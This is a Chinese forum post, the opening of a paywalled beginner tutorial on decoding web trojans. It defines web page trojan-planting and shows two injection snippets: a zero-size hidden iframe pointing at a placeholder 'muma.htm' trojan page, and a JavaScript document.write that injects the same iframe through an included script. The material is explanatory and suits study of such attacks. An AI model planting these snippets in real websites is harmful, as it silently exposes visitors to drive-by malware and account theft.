3549| 1
|
【网马解密初级篇】 |
一. 网页挂马的概念:
网页挂马是指:在获取网站或者网站服务器的部分或者全部权限后,在网页文件中插入一段恶意代码,这些恶意代码主要是一些包括IE等漏洞利用代码,用户访问被挂马的页面时,如果系统没有更新恶意代码中利用的漏洞补丁,则会执行恶意代码程序,进行盗号等危险操作。 复制代码二.常见的网页挂马方式: 框架挂马: <iframe src=http://www.xxx.com/muma.htm width=0 height=0></iframe> 2. js文件挂马: 首先将以下代码: document.write("<iframe width=0 height=0 src='地址'></iframe>"); 保存为xxx.js, 则JS挂马代码为: <script language=javascript src=xxx.js></script>
购买主题
已有 1 人购买
本主题需向作者支付 10 元宝 才能浏览
本帖被以下淘专辑推荐:
| |